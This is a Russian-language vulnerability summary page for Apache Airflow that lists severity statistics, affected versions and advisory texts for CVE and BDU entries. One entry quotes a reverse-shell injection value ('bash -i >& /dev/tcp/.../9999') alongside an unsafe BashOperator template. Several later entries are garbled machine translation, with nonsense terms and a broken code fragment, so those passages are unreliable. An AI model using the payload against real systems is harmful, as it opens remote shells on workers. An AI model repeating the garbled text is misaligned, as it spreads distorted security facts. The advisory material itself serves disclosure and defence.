Airflow
Уязвимости
186
Эксплуатируемые
2
Макс. CVSS
9.8
Макс. EPSS
0.997
Распределение по критичности
Критический
18
Высокий
53
Средний
110
Низкий
5
Затронутые диапазоны версий
1.0.0–1.10.151.10.0–1.10.151.10.0–2.7.02.0.0–2.1.32.0.0–3.0.02.0.0–3.2.22.10.0–2.10.12.2.4–2.3.32.3.0–2.3.42.3.0–2.6.12.4.0–2.7.02.4.0–2.9.32.5.0–2.6.22.6.0–2.7.32.7.0–2.7.22.7.0–2.7.32.7.0–2.9.02.8.0–2.8.32.8.2–2.8.42.9.0–2.9.13.0.0–3.0.53.0.0–3.1.13.0.0–3.1.83.0.0–3.2.0
Также сопоставлено как (исходные строки): airflow_cncf_kubernetes,apache-airflow-providers-mysql,apache-airflow-providers-apache-pinot,apache-airflow-providers-apache-hive,airflow_celery_provider,apache-airflow-providers-apache-pig,apache-airflow-providers-imap,apache-airflow-providers-fab,airflow,apache-airflow-providers-apache-spark,apache-airflow-providers-smtp
Топ уязвимостей
CVE-2024-42447Уязвимость недостаточного срока действия сессии в Apache Airflow Providers FAB.
Эта проблема затрагивает Apache Airflow Providers FAB: 1.2.1 (при использовании с Apache Airflow 2.9.3) и FAB 1.2.0 для всех версий Airflow. Провайдер FAB не позволял пользователю выйти из системы.
* FAB provider 1.2.1 затрагивал только Airflow 2.9.3 (более ранние и поздние версии Airflow не затрагиваются)
* FAB provider 1.2.0 затрагивал все версии Airflow.
Пользователям, использующим Apache Airflow 2.9.3, рекомендуется обновиться до Apache Airflow Providers FAB версии 1.2.2, в которой исправлена эта проблема.
Пользователям, использующим любую версию Apache Airflow и имеющим FAB provider 1.2.0, рекомендуется обновиться до Apache Airflow Providers FAB версии 1.2.2, в которой исправлена эта проблема.
Также рекомендуется обновить Apache Airflow до последней доступной версии.
Примечание: Ранняя версия эталонных контейнерных образов Airflow 2.9.3 и файлов ограничений содержала версию FAB provider 1.2.1, но это исправлено в обновленных версиях образов.
Пользователям рекомендуется загрузить последние образы Airflow или переустановить FAB provider в соответствии с текущими ограничениями.
CVE-2023-25754Ошибка переключения контекста привилегий в Apache Software Foundation Apache Airflow. Эта проблема затрагивает Apache Airflow: до 2.6.0.
CVE-2023-22884Неправильная нейтрализация специальных элементов, используемых в команде (уязвимость «Внедрение команды») в Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider. Эта проблема затрагивает Apache Airflow: до 2.5.1; Apache Airflow MySQL Provider: до 4.0.0.
CVE-2022-40189Неправильная нейтрализация специальных элементов, используемых в команде ОС («Внедрение команд ОС») в Apache Airflow Pig Provider, Apache Airflow позволяет злоумышленнику контролировать команды, выполняемые в контексте выполнения задачи, без доступа для записи к файлам DAG. Эта проблема затрагивает версии Pig Provider до 4.0.0. Это также влияет на любые версии Apache Airflow до 2.3.0 в случае установки Pig Provider (Pig Provider 4.0.0 можно установить только для Airflow 2.3.0+). Обратите внимание, что вам необходимо вручную установить Pig Provider версии 4.0.0, чтобы избавиться от уязвимости поверх версии Airflow 2.3.0+.
CVE-2022-38649Неправильная нейтрализация специальных элементов, используемых в OS Command ('OS Command Injection') уязвимость в Apache Airflow Pinot Provider, Apache Airflow позволяет злоумышленнику контролировать команды, выполняемые в контексте выполнения задачи, без доступа для записи к файлам DAG. Эта проблема затрагивает Apache Airflow Pinot Provider версии до 4.0.0. Это также влияет на любые версии Apache Airflow до 2.3.0, если установлен Apache Airflow Pinot Provider (Apache Airflow Pinot Provider 4.0.0 можно установить только для Airflow 2.3.0+). Обратите внимание, что вам необходимо вручную установить Pinot Provider версии 4.0.0, чтобы избавиться от уязвимости поверх версии Airflow 2.3.0+.
CVE-2022-38054В Apache Airflow версий с 2.2.4 по 2.3.3 серверный веб-компонент `database` был подвержен фиксации сессии.
CVE-2021-38540Эндпоинт импорта переменных не был защищен аутентификацией в Airflow >=2.0.0, <2.1.3. Это позволяло неаутентифицированным пользователям обращаться к этому эндпоинту для добавления/изменения переменных Airflow, используемых в DAG, что потенциально приводило к отказу в обслуживании, раскрытию информации или удаленному выполнению кода. Эта проблема затрагивает Apache Airflow >=2.0.0, <2.1.3.
CVE-2020-13927Предыдущая настройка по умолчанию для экспериментального API Airflow заключалась в том, чтобы разрешить все запросы API без аутентификации, но это создает риски безопасности для пользователей, которые упускают этот факт. Начиная с Airflow 1.10.11, значение по умолчанию было изменено на запрет всех запросов по умолчанию и задокументировано на https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Обратите внимание, что это изменение исправляет его для новых установок, но существующим пользователям необходимо изменить свою конфигурацию на значение по умолчанию `[api]auth_backend = airflow.api.auth.backend.deny_all`, как указано в Руководстве по обновлению: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default.
CVE-2020-11982В Apache Airflow версий 1.10.10 и ниже обнаружена проблема. При использовании CeleryExecutor, если злоумышленник может подключиться к брокеру (Redis, RabbitMQ) напрямую, можно вставить вредоносную полезную нагрузку непосредственно в брокер, что может привести к атаке десериализации (и, следовательно, к удаленному выполнению кода) на Worker.
CVE-2020-11981В Apache Airflow версий 1.10.10 и ниже обнаружена проблема. При использовании CeleryExecutor, если злоумышленник может подключиться к брокеру (Redis, RabbitMQ) напрямую, возможно внедрение команд, что приведет к тому, что celery worker будет выполнять произвольные команды.
CVE-2017-17836В Apache Airflow 1.8.2 и более ранних версиях экспериментальная функция Airflow отображала аутентифицированные файлы cookie, а также пароли к базам данных, используемым Airflow. Злоумышленник, имеющий ограниченный доступ к airflow, будь то через XSS или оставив машину разблокированной, может извлечь все учетные данные из системы.
BDU:2024-00754Уязвимость программного обеспечения создания, мониторинга и оркестрации сценариев обработки данных Airflow связана с недостатками механизма десериализации. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, подменить данные XCom, обойдя защиту настройки конфигурации "enable_xcom_pickling=False"
BDU:2023-00547Уязвимость пакета Airflow MySQL Provider программного обеспечения создания, мониторинга и оркестрации сценариев обработки данных Airflow связана с непринятием мер по нейтрализации специальных элементов, используемых в команде ОС. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, оказать воздействие на конфиденциальность, целостность и доступность защищаемой информации
BDU:2022-04643Уязвимость программного обеспечения создания, мониторинга и оркестрации сценариев обработки данных Airflow связана с непринятием мер по защите структуры веб-страницы. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнять произвольные команды
BDU:2022-04611Уязвимость программного обеспечения создания, мониторинга и оркестрации сценариев обработки данных Airflow связана с восстановлением в памяти недостоверной структуры данных. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, выполнить произвольный код или вызвать отказ в обслуживании
BDU:2022-00722Уязвимость компонента API программного обеспечения создания, мониторинга и оркестрации сценариев обработки данных Airflow связана с недостатками процедуры аутентификации. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, обойти существующие ограничения доступа и осуществлять запросы API без аутентификации
CVE-2026-42252Официальная документация Apache Airflow на `осном-концепции/dag-run.html` («Проходные параметры при запуске Dags») показала дословное `bashOperator(bash_command="echo значение: {{ {{ dag_run.conf['conf1'] }}")` без какого-либо предупреждения о цитировании / санации. Авторы Dag, которые копировали шаблон дословно в развертывания, где пользователи имели `Dag.can_trigger` разрешение на затронутый Dag (типичные развертывания с несколькими командами, размещенные предложения, раскрывающие триггерный API), могли подвергаться воздействию инъекции метрактера оболочки через поле `conf` триггерного API: аутентифицированный триггерный пользователь может поставлять `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` в качестве `conf` значения и достигать `os." на работника. Этот CVE охватывает исправление документации в `apache/airflow` PR 6129 - шаблон в примере документов теперь включает явную цитирование раковины и предостережение безопасности. Влияет на развертывания, код Dag которых был смоделирован на примере предварительного исправления. В том же классе, что и предыдущие CVE-2025-50213 и CVE-2025-27018. Пользователям рекомендуется обновить до 'apache-airflow` 3.2.2 или позже, чтобы забрать исправленную документацию, отправленную с выпуском.
CVE-2025-57735Когда пользователь вышел, токен JWT, с которым пользователь получил аутентификацию, не был признан недействительным, что может привести к повторному использованию этого токена в случае его перехвата. В Airflow 3.2 мы внедрили механизм, который реализует признание недействительными токенов при окладе. Пользователи, которые обеспокоены сценарием выхода и возможностью перехвата токенов, должны перейти на Airflow 3.2+
Пользователям рекомендуется обновиться до версии 3.2.0, которая устраняет эту проблему.
CVE-2026-49298Ошибка в KubernetesExecutor от Apache Airflow привела к тому, что токены JWT, используемые рабочими капсулами для аутентификации против API Execution, были переданы в рабочий контейнер в качестве аргументов командной строки, видимых в спецификации подката. Аутентифицированный пользователь UI/API с доступом только для чтения Kubernetes к кластеру (например, «pods/get» в пространстве имен Airflow) может собирать JWT из «kubectl» вывода pod', а затем вызывать конечные точки Execution API, вызывая запуски Dag, очищая прогоны, читая или записывая переменные / соединения / XComs — как если бы они были беговой задачей. Влияет на развертывание с помощью «Кубернета-исполнителя». Пользователям рекомендуется обновиться до 'apache-airflow` 3.2.2 или позже. Это половина воздушного потока той же уязвимости, к которой обращается [CVE-2026-27173] (https://www.cve.org/CVERecord?id=CVE-2026-27173), которая отгрузила apache-airflow-providers-cncf-kubernetes сторона исправления. Вспомогательные развертывания, которые уже повысили "apache-airflow-providers-cncf-kubernetes` до 10,17,0 или более поздней версии в соответствии с рекомендациями CVE-2026-27173", должны дополнительно повысить "apache-airflow` до 3.2.2 или позже" закрыть поверхность сердечника - два исправления являются дополнительными, а не дубликаты.
CVE-2026-42359Ошибка в конечной точке XCom PATCH `PATCH /api/v2/xcomEntries/{key}` позволила аутентифицированному пользователю UI/API с разрешением XCom писать на Dag на задание устанавливать записи XCom под зарезервированными именами ключей (например, `return_value`) что соответствующая конечная точка POST уже подтвердилась против `FORBIDDEN_XCOM_KEYS`. Конечная точка также приняла, что сериализованная полезная нагрузка формирует дезериалятор триггера как код; в сочетании это позволило RCE на триггере, когда затронутая задача следующая отложена. Влияет на развертывание, где ненадежным пользователям есть разрешение XCom на записи Dags, которые уступают триггер. Это исправление-обход CVE-2026-33858: PR #64148 добавил валидатор `FORBIDDEN_XCOM_KEYS` только на пути POST/set; путь PATCH не был покрыт. Пользователи, которые уже модернизировали CVE-2026-33858, должны дополнительно перейти на «apache-airflow` 3.2.2 или более поздней версии, чтобы покрыть объездную дорожку PATCH-путь».
CVE-2026-33858Авторы Dag, которые обычно не должны иметь возможность выполнять код в контексте веб-сервера, могут создать полезную нагрузку XCom, заставляя веб-сервер выполнять произвольный код. Поскольку Dag Authors уже очень доверяют, серьезность этой проблемы низка.
Пользователям рекомендуется обновиться до Apache Airflow 3.2.0, что решает эту проблему.
CVE-2026-30898Пример документации BashOperator в Airflow предложил способ прохождения dag_run.conf таким образом, который может привести к тому, что несанитарный пользовательский ввод будет использоваться для увеличения привилегий пользователя UI, чтобы разрешить выполнение кода на работника. Пользователи должны просмотреть, приняли ли какие-либо из своих собственных DAG этот неправильный совет.
CVE-2024-45498Пример DAG: example_inlet_event_extra.py, поставляемый с Apache Airflow версии 2.10.0, содержит уязвимость, позволяющую аутентифицированному злоумышленнику только с разрешением на запуск DAG выполнять произвольные команды. Если вы использовали этот пример в качестве основы для своих DAG, проверьте, не скопировали ли вы опасный пример; см. https://github.com/apache/airflow/pull/41873 для получения дополнительной информации. Мы не рекомендуем предоставлять примеры DAG в вашей развертке. Если вам необходимо предоставить примеры DAG, обновите Airflow до версии 2.10.1 или более поздней.
CVE-2024-45034Версии Apache Airflow до 2.10.1 имеют уязвимость, которая позволяет авторам DAG добавлять локальные настройки в папку DAG и запускать их планировщиком, где планировщик не должен выполнять код, отправленный автором DAG.
Пользователям рекомендуется обновить версию до 2.10.1 или более поздней, в которой эта уязвимость устранена.
CVE-2024-39877В Apache Airflow 2.4.0 и версиях до 2.9.3 существует уязвимость, позволяющая аутентифицированным авторам DAG создавать параметр doc_md таким образом, чтобы можно было выполнить произвольный код в контексте планировщика, что должно быть запрещено в соответствии с моделью безопасности Airflow. Пользователям следует обновиться до версии 2.9.3 или более поздней, в которой эта уязвимость устранена.